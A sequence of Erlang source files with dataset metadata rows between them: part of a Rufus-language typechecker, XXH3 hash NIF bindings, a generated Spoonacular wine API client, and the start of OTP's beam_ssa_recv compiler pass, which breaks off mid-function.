validate_case_clause_return_type(_, []) ->
ok.
%% cons form helpers
%% typecheck_and_annotate_cons enforces the constraint that the head and tail
%% elements are of the expected type. Return values:
%% - `{ok, AnnotatedForm}` if no issues are found.
%% - `{error, unexpected_element_type, Data}` is thrown if either the head or
%% tail elements have type issues.
-spec typecheck_and_annotate_cons(rufus_stack(), globals(), locals(), cons_form()) ->
{ok, locals(), cons_form()} | no_return().
typecheck_and_annotate_cons(
Stack,
Globals,
Locals,
Form = {cons, Context = #{head := Head, tail := Tail}}
) ->
ConsStack = [Form | Stack],
HeadStack = [rufus_form:make_cons_head(Form) | ConsStack],
{ok, NewLocals1, [AnnotatedHead]} = typecheck_and_annotate([], HeadStack, Globals, Locals, [
Head
]),
TailStack = [rufus_form:make_cons_tail(Form) | ConsStack],
{ok, NewLocals2, [AnnotatedTail]} = typecheck_and_annotate(
[],
TailStack,
Globals,
NewLocals1,
[
Tail
]
),
AnnotatedForm1 = {cons, Context#{head => AnnotatedHead, tail => AnnotatedTail}},
case rufus_type:resolve(Globals, AnnotatedForm1) of
{ok, TypeForm} ->
AnnotatedForm2 =
{cons, Context#{
head => AnnotatedHead,
tail => AnnotatedTail,
type => TypeForm
}},
{ok, NewLocals2, AnnotatedForm2};
Error ->
throw(Error)
end.
%% func form helpers
%% typecheck_and_annotate_func_params resolves and annotates types for each parameter
%% in a function parameter list to ensure they satisfy type constraints.
-spec typecheck_and_annotate_func_params(rufus_stack(), func_form()) ->
{ok, func_form()} | no_return().
typecheck_and_annotate_func_params(
Stack,
Form =
{func,
Context = #{
params := Params,
exprs := Exprs,
return_type := ReturnType,
line := Line
}}
) ->
FuncStack = [Form | Stack],
ParamsStack = [rufus_form:make_func_params(Form) | FuncStack],
{ok, Locals, AnnotatedParams} = typecheck_and_annotate(
[],
ParamsStack,
#{},
#{},
Params
),
ParamTypes = lists:map(fun(ParamForm) -> rufus_form:type(ParamForm) end, AnnotatedParams),
FuncType = rufus_form:make_type(func, ParamTypes, ReturnType, Line),
%% Local symbols from the parameter list are captured and stored on the
%% annotated func form. They're used during the second pass when the
%% function body is typechecked.
AnnotatedForm =
{func, Context#{
params => AnnotatedParams,
exprs => Exprs,
type => FuncType,
locals => Locals
}},
{ok, AnnotatedForm}.
%% typecheck_and_annotate_func adds all parameters to the local scope. It also
%% resolves and annotates types for all expressions in the function body to
%% ensure they satisfy type constraints.
-spec typecheck_and_annotate_func(rufus_stack(), globals(), locals(), func_form()) ->
{ok, func_form()} | no_return().
typecheck_and_annotate_func(
Stack,
Globals,
Locals1,
Form =
{func,
Context1 = #{
exprs := Exprs,
locals := Locals2
}}
) ->
%% This version of the function is only called for module-level functions,
%% which have locals in their context.
Locals3 = maps:merge(Locals1, Locals2),
FuncStack = [Form | Stack],
ExprsStack = [rufus_form:make_func_exprs(Form) | FuncStack],
{ok, _NewLocals2, AnnotatedExprs} = typecheck_and_annotate(
[],
ExprsStack,
Globals,
Locals3,
Exprs
),
Context2 = maps:remove(locals, Context1),
AnnotatedForm =
{func, Context2#{
exprs => AnnotatedExprs
}},
ok = typecheck_func_return_type(Globals, AnnotatedForm),
{ok, AnnotatedForm};
typecheck_and_annotate_func(
Stack,
Globals,
Locals,
Form =
{func,
Context = #{
params := Params,
return_type := ReturnType,
exprs := Exprs,
line := Line
}}
) ->
%% This version of the function is only called for anonymous functions,
%% which don't have locals in their context.
FuncStack = [Form | Stack],
ParamsStack = [rufus_form:make_func_params(Form) | FuncStack],
{ok, NewLocals1, AnnotatedParams} = typecheck_and_annotate(
[],
ParamsStack,
Globals,
Locals,
Params
),
ParamTypes = lists:map(fun(ParamForm) -> rufus_form:type(ParamForm) end, AnnotatedParams),
FuncType = rufus_form:make_type(func, ParamTypes, ReturnType, Line),
ExprsStack = [rufus_form:make_func_exprs(Form) | FuncStack],
{ok, _NewLocals2, AnnotatedExprs} = typecheck_and_annotate(
[],
ExprsStack,
Globals,
NewLocals1,
Exprs
),
AnnotatedForm =
{func, Context#{
params => AnnotatedParams,
exprs => AnnotatedExprs,
type => FuncType
}},
ok = typecheck_func_return_type(Globals, AnnotatedForm),
{ok, AnnotatedForm}.
%% typecheck_func_return_type enforces the constraint that the type of the final
%% expression in a function matches its return type. `ok` is returned if
%% typechecks all pass, otherwise an `{error, unmatched_return_type, Data}`
%% error triple is thrown.
-spec typecheck_func_return_type(globals(), func_form()) -> ok | no_return().
typecheck_func_return_type(Globals, {func, #{return_type := ReturnType, exprs := Exprs}}) ->
LastExpr = lists:last(Exprs),
case rufus_type:resolve(Globals, LastExpr) of
{ok, {type, #{spec := ActualSpec}}} ->
{type, #{spec := ExpectedSpec}} = ReturnType,
case ExpectedSpec == ActualSpec orelse rufus_form:type_kind(LastExpr) == throw of
true ->
ok;
false ->
Data = #{
globals => Globals,
return_type => ReturnType,
expr => LastExpr,
actual => ActualSpec,
expected => ExpectedSpec
},
throw({error, unmatched_return_type, Data})
end;
Error ->
throw(Error)
end.
%% identifier form helpers
%% typecheck_and_annotate_identifier adds a locals key/value pair to the
%% identifier with information about local variables that are in scope. Type
%% information is also added to the identifier form if present in Locals. Return
%% values:
%% - `{ok, AnnotatedForm}` with locals and type information..
-spec typecheck_and_annotate_identifier(rufus_stack(), globals(), locals(), identifier_form()) ->
{ok, locals(), identifier_form()}.
typecheck_and_annotate_identifier(
Stack,
Globals,
Locals,
Form = {identifier, Context1 = #{spec := Spec}}
) ->
{ok, AnnotatedForm1} = annotate_locals(Locals, Form),
case maps:get(Spec, Locals, undefined) of
undefined ->
case rufus_type:resolve(Stack, Globals, AnnotatedForm1) of
{ok, TypeForm} ->
{identifier, Context2} = AnnotatedForm1,
AnnotatedForm2 = {identifier, Context2#{type => TypeForm}},
{ok, NewLocals} = push_local(Locals, AnnotatedForm2),
{ok, NewLocals, AnnotatedForm2};
{error, Reason, Data} ->
throw({error, Reason, Data})
end;
[TypeForm] ->
AnnotatedForm2 = {identifier, Context1#{type => TypeForm}},
{ok, Locals, AnnotatedForm2}
end.
%% list_lit form helpers
%% typecheck_and_annotate_list_lit enforces the constraint that each list
%% element matches the collection type. Returns values:
%% - `{ok, Locals, AnnotatedForm}` if no issues are found. The list_lit form and
%% its elements are annotated with type information.
%% - `{error, unexpected_element_type, Data}` is thrown if an element is found
%% with a differing type.
-spec typecheck_and_annotate_list_lit(rufus_stack(), globals(), locals(), list_lit_form()) ->
{ok, locals(), list_lit_form()} | no_return().
typecheck_and_annotate_list_lit(
Stack,
Globals,
Locals,
Form = {list_lit, Context = #{elements := Elements}}
) ->
ListLitStack = [Form | Stack],
{ok, NewLocals, AnnotatedElements} = typecheck_and_annotate(
[],
ListLitStack,
Globals,
Locals,
Elements
),
AnnotatedForm1 = {list_lit, Context#{elements => AnnotatedElements}},
case rufus_type:resolve(Globals, AnnotatedForm1) of
{ok, TypeForm} ->
AnnotatedForm2 = {list_lit, Context#{elements => AnnotatedElements, type => TypeForm}},
{ok, NewLocals, AnnotatedForm2};
Error ->
throw(Error)
end.
%% match_op form helpers
%% typecheck_and_annotate_match_op ensures that match_op operands have matching
%% types. Unknown identifiers in the left operand are treated as unbound
%% variables and their type information is inferred from the right operand.
%% Return values:
%% - `{ok, Locals, AnnotatedForm}` if no issues are found. The match_op form and
%% its operands are annotated with type information.
%% - `{error, unknown_identifier, Data}` is thrown if the right operand is
%% unbound.
%% - `{error, unmatched_types, Data}` is thrown when the left and right operand
%% have differing types.
-spec typecheck_and_annotate_match_op(rufus_stack(), globals(), locals(), match_op_form()) ->
{ok, locals(), match_op_form()} | no_return().
typecheck_and_annotate_match_op(
Stack,
Globals,
Locals,
Form = {match_op, Context = #{left := Left, right := Right}}
) ->
MatchOpStack1 = [Form | Stack],
RightStack = [rufus_form:make_match_op_right(Form) | MatchOpStack1],
{ok, NewLocals1, [AnnotatedRight]} = typecheck_and_annotate(
[],
RightStack,
Globals,
Locals,
[Right]
),
AnnotatedForm1 = {match_op, Context#{right => AnnotatedRight}},
MatchOpStack2 = [AnnotatedForm1 | Stack],
LeftStack = [rufus_form:make_match_op_left(Form) | MatchOpStack2],
{ok, NewLocals2, [AnnotatedLeft]} = typecheck_and_annotate(
[],
LeftStack,
Globals,
NewLocals1,
[Left]
),
case rufus_form:type_spec(AnnotatedLeft) == rufus_form:type_spec(AnnotatedRight) of
true ->
AnnotatedForm2 =
{match_op, Context#{
left => AnnotatedLeft,
right => AnnotatedRight,
type => rufus_form:type(AnnotatedRight)
}},
ok = validate_pattern(Globals, NewLocals2, AnnotatedForm2),
{ok, NewLocals2, AnnotatedForm2};
false ->
Data = #{
globals => Globals,
locals => Locals,
left => AnnotatedLeft,
right => AnnotatedRight
},
throw({error, unmatched_types, Data})
end.
%% validate_pattern checks the left hand side of a pattern match_op expression
%% for valid expressions. An `{error, illegal_pattern, Data}` error triple is
%% thrown if an invalid expression is found.
%%
%% TODO(jkakar) Figure out why Dialyzer doesn't like this spec:
%% -spec validate_pattern(globals(), locals(), match_op_form()) -> ok | no_return().
validate_pattern(Globals, Locals, Form = {match_op, _Context}) ->
Data = #{
globals => Globals,
locals => Locals,
form => Form
},
validate_pattern(Data, Form).
%% validate_pattern inspects the left hand operand of a match_op form to ensure
%% that its a valid pattern. A pattern has the same structure as a term but can
%% contain unbound variables. An `{error, illegal_pattern, Data}` error triple
%% is thrown if the left hand operand contains unsupported expressions.
-spec validate_pattern(context(), rufus_form()) -> ok | no_return().
validate_pattern(Data, {match_op, #{left := Left}}) ->
validate_pattern(Data, Left);
validate_pattern(_Data, {atom_lit, _Context}) ->
ok;
validate_pattern(_Data, {bool_lit, _Context}) ->
ok;
validate_pattern(_Data, {float_lit, _Context}) ->
ok;
validate_pattern(_Data, {int_lit, _Context}) ->
ok;
validate_pattern(_Data, {string_lit, _Context}) ->
ok;
validate_pattern(_Data, {list_lit, _Context}) ->
ok;
validate_pattern(_Data, {cons, _Context}) ->
ok;
validate_pattern(_Data, {identifier, _Context}) ->
ok;
validate_pattern(Data, Form = {binary_op, _Context}) ->
case is_constant_expr(Form) of
true ->
ok;
false ->
throw({error, illegal_pattern, Data})
end;
validate_pattern(Data, _Form) ->
throw({error, illegal_pattern, Data}).
%% is_constant_expr returns true if a binary_op can be evaluated to a constant
%% during compilation. Otherwise, it returns false.
-spec is_constant_expr(rufus_form()) -> boolean().
is_constant_expr({binary_op, #{left := Left, right := Right}}) ->
is_constant_expr(Left) and is_constant_expr(Right);
is_constant_expr({float_lit, _Context}) ->
true;
is_constant_expr({int_lit, _Context}) ->
true;
is_constant_expr(_Form) ->
false.
%% throw helpers
typecheck_and_annotate_throw(
Stack,
Globals,
Locals,
{throw, Context = #{expr := Expr}}
) ->
{ok, NewLocals, [AnnotatedExpr]} = typecheck_and_annotate([], Stack, Globals, Locals, [Expr]),
AnnotatedForm1 = {throw, Context#{expr => AnnotatedExpr}},
case rufus_type:resolve(Stack, Globals, AnnotatedForm1) of
{ok, TypeForm} ->
AnnotatedForm2 = {throw, Context#{expr => AnnotatedExpr, type => TypeForm}},
{ok, NewLocals, AnnotatedForm2};
Error ->
throw(Error)
end.
%% try/catch/after helpers
%% typecheck_and_annotate_try_catch_after ensures that try and catch blocks have
%% a valid sequence of expressions and matching return types. New identifiers in
%% either the try or catch block are not visible in the surrounding scope.
%% Return values:
%% - `{ok, Locals, AnnotatedForm}` if no issues are found. The try_catch_after
%% form is annotated with type information.
%% - `{error, mismatched_try_catch_return_types, Data}` is thrown if the try and
%% catch blocks have return values with different types.
-spec typecheck_and_annotate_try_catch_after(
rufus_stack(),
globals(),
locals(),
try_catch_after_form()
) -> {ok, locals(), try_catch_after_form()} | no_return().
typecheck_and_annotate_try_catch_after(
Stack,
Globals,
Locals,
{try_catch_after,
Context = #{
try_exprs := TryExprs,
catch_clauses := CatchClauses,
after_exprs := AfterExprs
}}
) ->
{ok, _NewLocals1, AnnotatedTryExprs} = typecheck_and_annotate(
[],
Stack,
Globals,
Locals,
TryExprs
),
AnnotatedForm1 = {try_catch_after, Context#{try_exprs => AnnotatedTryExprs}},
TryCatchAfterStack = [AnnotatedForm1 | Stack],
AnnotatedCatchClauses = lists:map(
fun(CatchClause) ->
{ok, _, [AnnotatedCatchClause]} = typecheck_and_annotate(
[],
TryCatchAfterStack,
Globals,
Locals,
[CatchClause]
),
AnnotatedCatchClause
end,
CatchClauses
),
{ok, _NewLocals2, AnnotatedAfterExprs} = typecheck_and_annotate(
[],
Stack,
Globals,
Locals,
AfterExprs
),
ok = typecheck_try_catch_return_types(AnnotatedTryExprs, AnnotatedCatchClauses),
AnnotatedForm2 =
{try_catch_after, Context#{
try_exprs => AnnotatedTryExprs,
catch_clauses => AnnotatedCatchClauses,
after_exprs => AnnotatedAfterExprs
}},
case rufus_type:resolve(Stack, Globals, AnnotatedForm2) of
{ok, TypeForm} ->
AnnotatedForm3 =
{try_catch_after, Context#{
try_exprs => AnnotatedTryExprs,
catch_clauses => AnnotatedCatchClauses,
after_exprs => AnnotatedAfterExprs,
type => TypeForm
}},
{ok, Locals, AnnotatedForm3};
Error ->
throw(Error)
end.
%% typecheck_try_catch_return_types ensures that the try block and all catch
%% blocks have the same return type.
-spec typecheck_try_catch_return_types(
rufus_forms(),
list(catch_clause_form())
) -> ok | no_return().
typecheck_try_catch_return_types(TryExprs, CatchClauses) ->
LastTryExpr = lists:last(TryExprs),
TryExprTypeForm = rufus_form:type(LastTryExpr),
Acc1 =
case TryExprTypeForm of
{type, #{kind := throw}} ->
[];
_ ->
[{LastTryExpr, TryExprTypeForm}]
end,
CatchClauseTypeForms = lists:map(
fun(CatchClauseForm) -> {CatchClauseForm, rufus_form:type(CatchClauseForm)} end,
CatchClauses
),
FormPairs = lists:foldr(
fun(Element, Acc2) ->
case Element of
{_Form, {type, #{kind := throw}}} -> Acc2;
_ -> [Element | Acc2]
end
end,
Acc1,
CatchClauseTypeForms
),
validate_try_catch_return_type([], FormPairs).
%% validate_try_catch_return_type iterates over {Form, TypeForm} 2-tuples and
%% returns ok if the types for pairs match, or throws an {error,
%% mismatched_try_catch_return_type, Data} 3-tuple.
%% -spec validate_try_catch_return_type(list(atom), list({rufus_form(), type_form()})) ->
%% ok | no_return.
validate_try_catch_return_type([Spec], [{_Form, {type, #{spec := Spec}}} | T]) ->
validate_try_catch_return_type([Spec], T);
validate_try_catch_return_type([], [{_Form, {type, #{spec := Spec}}} | T]) ->
validate_try_catch_return_type([Spec], T);
validate_try_catch_return_type([ExpectedSpec], [{Form, {type, #{spec := ActualSpec}}} | _T]) ->
Data = #{
form => Form,
actual => ActualSpec,
expected => ExpectedSpec
},
throw({error, mismatched_try_catch_return_type, Data});
validate_try_catch_return_type(_, []) ->
ok.
%% typecheck_and_annotate_catch_clause typechecks and annotates the match
%% expression and body expressions of a catch block. Return values:
%% - `{ok, AnnotatedForm}` if no issues are found. The catch_clause form is
%% annotated with type information.
%% - An error is thrown is `rufus_type:resolve/3` returns an error.
-spec typecheck_and_annotate_catch_clause(
rufus_stack(),
globals(),
locals(),
catch_clause_form()
) -> {ok, catch_clause_form()} | no_return().
typecheck_and_annotate_catch_clause(
Stack,
Globals,
Locals,
Form = {catch_clause, Context = #{match_expr := MatchExpr, exprs := Exprs}}
) ->
CatchClauseStack = [Form | Stack],
{ok, NewLocals, [AnnotatedMatchExpr]} = typecheck_and_annotate(
[],
CatchClauseStack,
Globals,
Locals,
[MatchExpr]
),
{ok, _, AnnotatedExprs} = typecheck_and_annotate([], Stack, Globals, NewLocals, Exprs),
AnnotatedForm1 =
{catch_clause, Context#{
match_expr => AnnotatedMatchExpr,
exprs => AnnotatedExprs
}},
case rufus_type:resolve(Stack, Globals, AnnotatedForm1) of
{ok, TypeForm} ->
AnnotatedForm2 =
{catch_clause, Context#{
match_expr => AnnotatedMatchExpr,
exprs => AnnotatedExprs,
type => TypeForm
}},
{ok, AnnotatedForm2};
Error ->
throw(Error)
end.
%% scope helpers
%% annotate_locals adds a `locals` key to a form context.
-spec annotate_locals(locals(), rufus_form()) -> {ok, rufus_form()}.
annotate_locals(Locals, {FormType, Context}) ->
{ok, {FormType, Context#{locals => Locals}}}.
%% push_local adds a form to the local scope. Anonymous variables are ignored.
-spec push_local(locals(), rufus_form()) -> {ok, locals()}.
push_local(Locals, {identifier, #{spec := '_'}}) ->
{ok, Locals};
push_local(Locals, {param, #{spec := '_'}}) ->
{ok, Locals};
push_local(Locals, {_FormType, #{spec := Spec, type := Type}}) ->
{ok, Locals#{Spec => [Type]}}. | rf/src/rufus_expr.erl | 0.562777 | 0.640734 | rufus_expr.erl | starcoder |
%%%-------------------------------------------------------------------
%% @doc NIF bindings for XXH3 hash functions implemented in Rust
%%
%% XXH3 is a new speed-optimized hash algorithm of the xxHash family
%% of non-cryptographic hash functions, featuring:
%% <ul>
%% <li>Improved speed for both small and large inputs</li>
%% <li>True 64-bit and 128-bit outputs</li>
%% <li>SIMD acceleration</li>
%% <li>Improved 32-bit viability</li>
%% </ul>
%%
%% Speed analysis methodology is explained here:
%%
%% https://fastcompression.blogspot.com/2019/03/presenting-xxh3.html
%%
%% @end
%%%-------------------------------------------------------------------
-module(xxh3).
-export([
new/0, new/1,
new_with_secret/1,
update/2,
reset/1,
digest/1,
hash64/1, hash64/2,
hash64_with_secret/2,
hash128/1, hash128/2,
hash128_with_secret/2
]).
-include("crates.hrl").
-opaque xxh3_ref() :: reference().
-export_type([xxh3_ref/0]).
-define(not_loaded, not_loaded(?LINE)).
-on_load(init/0).
init() ->
?load_nif_from_crate(xxh3, ?crate_xxh3, 0).
%% @doc Creates a new 64-bit hasher with default secret.
%%
%% You can stream data to the returned object using {@link update/2},
%% and calculate intermediate hash values using {@link digest/1}.
-spec new() -> xxh3_ref().
new() ->
?not_loaded.
%% @doc Creates a new 64-bit hasher with the given `Seed'.
-spec new(non_neg_integer()) -> xxh3_ref().
new(_Seed) ->
?not_loaded.
%% @doc Creates a new 64-bit hasher with the given `Secret'.
%%
%% `Secret' must be a binary of size 192 bytes.
-spec new_with_secret(binary()) -> xxh3_ref().
new_with_secret(_Secret) ->
?not_loaded.
%% @doc Updates hasher state with the given chunk of data.
-spec update(xxh3_ref(), binary()) -> ok.
update(_Resource, _Data) ->
?not_loaded.
%% @doc Resets hasher state.
-spec reset(xxh3_ref()) -> ok.
reset(_Resource) ->
?not_loaded.
%% @doc Computes hash for streamed data.
-spec digest(xxh3_ref()) -> non_neg_integer().
digest(_Resource) ->
?not_loaded.
%% @doc Returns 64-bit hash for the given `Data'.
%%
%% This is default 64-bit variant, using default secret and default seed of 0.
%% It's the fastest variant.
-spec hash64(binary()) -> non_neg_integer().
hash64(_Data) ->
?not_loaded.
%% @doc Returns 64-bit hash for the given `Data' with `Seed' value.
%%
%% This variant generates a custom secret on the fly
%% based on default secret altered using the `Seed' value.
%% While this operation is decently fast, note that it's not completely free.
-spec hash64(binary(), non_neg_integer()) -> non_neg_integer().
hash64(_Data, _Seed) ->
?not_loaded.
%% @doc Returns 64-bit hash for the given `Data' with a custom `Secret'.
%%
%% It's possible to provide any binary as a "secret" to generate the hash.
%% This makes it more difficult for an external actor to prepare an intentional collision.
%% The main condition is that `Secret' size *must* be large enough (>= 136 bytes).
%% However, the quality of produced hash values depends on secret's entropy.
%% Technically, the secret must look like a bunch of random bytes.
%% Avoid "trivial" or structured data such as repeated sequences or a text document.
-spec hash64_with_secret(binary(), binary()) -> non_neg_integer().
hash64_with_secret(_Data, _Secret) ->
?not_loaded.
%% @doc Returns 128-bit hash for the given `Data'.
%%
%% This is default 128-bit variant, using default secret and default seed of 0.
-spec hash128(binary()) -> non_neg_integer().
hash128(Data) ->
binary:decode_unsigned(hash128_with_seed_bin(Data, 0)).
%% @doc Returns 128-bit hash for the given `Data' with `Seed' value.
%%
%% See {@link hash64/2} for more details.
-spec hash128(binary(), non_neg_integer()) -> non_neg_integer().
hash128(Data, Seed) ->
binary:decode_unsigned(hash128_with_seed_bin(Data, Seed)).
%% @doc Returns 128-bit hash for the given `Data' with a custom `Secret'.
%%
%% See {@link hash64_with_secret/2} for more details.
-spec hash128_with_secret(binary(), binary()) -> non_neg_integer().
hash128_with_secret(Data, Secret) ->
binary:decode_unsigned(hash128_with_secret_bin(Data, Secret)).
%%%-------------------------------------------------------------------
%% Internal functions
%%%-------------------------------------------------------------------
hash128_with_seed_bin(_Data, _Seed) ->
?not_loaded.
hash128_with_secret_bin(_Data, _Secret) ->
?not_loaded.
not_loaded(Line) ->
erlang:nif_error({not_loaded, [{module, ?MODULE}, {line, Line}]}). | src/xxh3.erl | 0.761095 | 0.531209 | xxh3.erl | starcoder |
-module(spoonacular_wine_api).
-export([get_dish_pairing_for_wine/2, get_dish_pairing_for_wine/3,
get_wine_description/2, get_wine_description/3,
get_wine_pairing/2, get_wine_pairing/3,
get_wine_recommendation/2, get_wine_recommendation/3]).
-define(BASE_URL, "").
%% @doc Dish Pairing for Wine
%% Find a dish that goes well with a given wine.
-spec get_dish_pairing_for_wine(ctx:ctx(), binary()) -> {ok, spoonacular_inline_response_200_44:spoonacular_inline_response_200_44(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_dish_pairing_for_wine(Ctx, Wine) ->
get_dish_pairing_for_wine(Ctx, Wine, #{}).
-spec get_dish_pairing_for_wine(ctx:ctx(), binary(), maps:map()) -> {ok, spoonacular_inline_response_200_44:spoonacular_inline_response_200_44(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_dish_pairing_for_wine(Ctx, Wine, Optional) ->
_OptionalParams = maps:get(params, Optional, #{}),
Cfg = maps:get(cfg, Optional, application:get_env(kuberl, config, #{})),
Method = get,
Path = ["/food/wine/dishes"],
QS = lists:flatten([{<<"wine">>, Wine}])++spoonacular_utils:optional_params([], _OptionalParams),
Headers = [],
Body1 = [],
ContentTypeHeader = spoonacular_utils:select_header_content_type([]),
Opts = maps:get(hackney_opts, Optional, []),
spoonacular_utils:request(Ctx, Method, [?BASE_URL, Path], QS, ContentTypeHeader++Headers, Body1, Opts, Cfg).
%% @doc Wine Description
%% Get a simple description of a certain wine, e.g. \"malbec\", \"riesling\", or \"merlot\".
-spec get_wine_description(ctx:ctx(), binary()) -> {ok, spoonacular_inline_response_200_46:spoonacular_inline_response_200_46(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_wine_description(Ctx, Wine) ->
get_wine_description(Ctx, Wine, #{}).
-spec get_wine_description(ctx:ctx(), binary(), maps:map()) -> {ok, spoonacular_inline_response_200_46:spoonacular_inline_response_200_46(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_wine_description(Ctx, Wine, Optional) ->
_OptionalParams = maps:get(params, Optional, #{}),
Cfg = maps:get(cfg, Optional, application:get_env(kuberl, config, #{})),
Method = get,
Path = ["/food/wine/description"],
QS = lists:flatten([{<<"wine">>, Wine}])++spoonacular_utils:optional_params([], _OptionalParams),
Headers = [],
Body1 = [],
ContentTypeHeader = spoonacular_utils:select_header_content_type([]),
Opts = maps:get(hackney_opts, Optional, []),
spoonacular_utils:request(Ctx, Method, [?BASE_URL, Path], QS, ContentTypeHeader++Headers, Body1, Opts, Cfg).
%% @doc Wine Pairing
%% Find a wine that goes well with a food. Food can be a dish name (\"steak\"), an ingredient name (\"salmon\"), or a cuisine (\"italian\").
-spec get_wine_pairing(ctx:ctx(), binary()) -> {ok, spoonacular_inline_response_200_45:spoonacular_inline_response_200_45(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_wine_pairing(Ctx, Food) ->
get_wine_pairing(Ctx, Food, #{}).
-spec get_wine_pairing(ctx:ctx(), binary(), maps:map()) -> {ok, spoonacular_inline_response_200_45:spoonacular_inline_response_200_45(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_wine_pairing(Ctx, Food, Optional) ->
_OptionalParams = maps:get(params, Optional, #{}),
Cfg = maps:get(cfg, Optional, application:get_env(kuberl, config, #{})),
Method = get,
Path = ["/food/wine/pairing"],
QS = lists:flatten([{<<"food">>, Food}])++spoonacular_utils:optional_params(['maxPrice'], _OptionalParams),
Headers = [],
Body1 = [],
ContentTypeHeader = spoonacular_utils:select_header_content_type([]),
Opts = maps:get(hackney_opts, Optional, []),
spoonacular_utils:request(Ctx, Method, [?BASE_URL, Path], QS, ContentTypeHeader++Headers, Body1, Opts, Cfg).
%% @doc Wine Recommendation
%% Get a specific wine recommendation (concrete product) for a given wine type, e.g. \"merlot\".
-spec get_wine_recommendation(ctx:ctx(), binary()) -> {ok, spoonacular_inline_response_200_47:spoonacular_inline_response_200_47(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_wine_recommendation(Ctx, Wine) ->
get_wine_recommendation(Ctx, Wine, #{}).
-spec get_wine_recommendation(ctx:ctx(), binary(), maps:map()) -> {ok, spoonacular_inline_response_200_47:spoonacular_inline_response_200_47(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_wine_recommendation(Ctx, Wine, Optional) ->
_OptionalParams = maps:get(params, Optional, #{}),
Cfg = maps:get(cfg, Optional, application:get_env(kuberl, config, #{})),
Method = get,
Path = ["/food/wine/recommendation"],
QS = lists:flatten([{<<"wine">>, Wine}])++spoonacular_utils:optional_params(['maxPrice', 'minRating', 'number'], _OptionalParams),
Headers = [],
Body1 = [],
ContentTypeHeader = spoonacular_utils:select_header_content_type([]),
Opts = maps:get(hackney_opts, Optional, []),
spoonacular_utils:request(Ctx, Method, [?BASE_URL, Path], QS, ContentTypeHeader++Headers, Body1, Opts, Cfg). | erlang/src/spoonacular_wine_api.erl | 0.566019 | 0.420629 | spoonacular_wine_api.erl | starcoder |
%%
%% %CopyrightBegin%
%%
%% Copyright Ericsson AB 2018-2021. All Rights Reserved.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% %CopyrightEnd%
%%
-module(beam_ssa_recv).
-export([format_error/1, module/2]).
%%%
%%% In code such as:
%%%
%%% Ref = make_ref(), %Or erlang:monitor(process, Pid)
%%% .
%%% .
%%% .
%%% receive
%%% {Ref,Reply} -> Reply
%%% end.
%%%
%%% we know that none of the messages that exist in the message queue
%%% before the call to make_ref/0 can be matched out in the receive
%%% statement. Therefore we can avoid going through the entire message
%%% queue if we introduce four new instructions (here written as BIFs
%%% in pseudo-Erlang):
%%%
%%% OpaqueMarker = 'reserve_marker'(),
%%% Ref = make_ref(),
%%% 'bind_marker'(OpaqueMarker, Ref),
%%% .
%%% .
%%% .
%%% 'use_marker'(Ref),
%%% receive
%%% {Ref,Reply} ->
%%% 'clear_marker'(Ref),
%%% Reply
%%% end.
%%%
%%% The reserve_marker/0 instruction returns an opaque term representing the
%%% current message queue position (this is never visible to the end user).
%%%
%%% To use a marker it must first be bound to a term using bind_marker/2. This
%%% essentially renames the marker and all subsequent operations will use the
%%% bound term instead.
%%%
%%% Having separate "reserve" and "bind" steps may seem verbose but is
%%% necessary to avoid races in monitor/2 and friends: if the marker is not
%%% created before the call, we may get a 'DOWN' message after monitor/2
%%% returns but before the marker is created.
%%%
%%% The use_marker/1 instruction is used before suitable receive loops to start
%%% the search at the previously saved position.
%%%
%%% When the marker is no longer needed we can use clear_marker/1 to remove
%%% it. This is not strictly required as the number of active markers are
%%% limited and they may be overwritten as new ones are created, but being a
%%% good citizen reduces the risk of overwriting a marker that would otherwise
%%% have been used later on.
%%%
%%% It's important to note that use_marker/1 and clear_marker/1 do nothing when
%%% given anything other than a currently active marker. This lets us apply the
%%% optimization even when a given receive _doesn't always_ have a suitable
%%% reference to work with, for example:
%%%
%%% first_function(Pid, Foo) ->
%%% OpaqueMarker = 'reserve_marker'(),
%%% Ref = make_ref(),
%%% 'bind_marker'(OpaqueMarker, Ref),
%%% Pid ! {self(), Ref, Foo},
%%% await_result(Ref).
%%%
%%% second_function(Pid, Foo) ->
%%% {Bar, Tag} = foo:bar(Foo),
%%% Pid ! {self(), Tag, Bar},
%%% await_result(Tag).
%%%
%%% await_result(Tag) ->
%%% 'use_marker'(Tag),
%%% receive
%%% {Tag, Result} -> Result
%%% end.
%%%
%%% Because use_marker/1 ignores terms that haven't been bound to a marker, the
%%% optimization is applied when await_result/1 is reached through
%%% first_function/2, but not second_function/2. If these instructions required
%%% markers (active or not) we would have to disable the optimization in cases
%%% like this.
%%%
-include("beam_ssa.hrl").
-import(lists, [foldl/3, search/2]).
%% Psuedo-block for representing function returns in the block graph. Body
%% calls add an edge returning _from_ this block.
-define(RETURN_BLOCK, -1).
-define(ENTRY_BLOCK, 0).
-spec format_error(term()) -> nonempty_string().
format_error(OptInfo) ->
format_opt_info(OptInfo).
-record(scan, { graph=beam_digraph:new(),
module :: #{ beam_ssa:b_local() => {beam_ssa:block_map(),
[beam_ssa:b_var()]} },
recv_candidates=#{},
ref_candidates=#{} }).
-spec module(Module, Options) -> Result when
Module :: beam_ssa:b_module(),
Options :: [compile:option()],
Result :: {ok, beam_ssa:b_module(), list()}.
module(#b_module{}=Mod0, Opts) ->
case scan(Mod0) of
#scan{}=Scan ->
%% Figure out where to place marker creation, usage, and clearing
%% by walking through the module-wide graph.
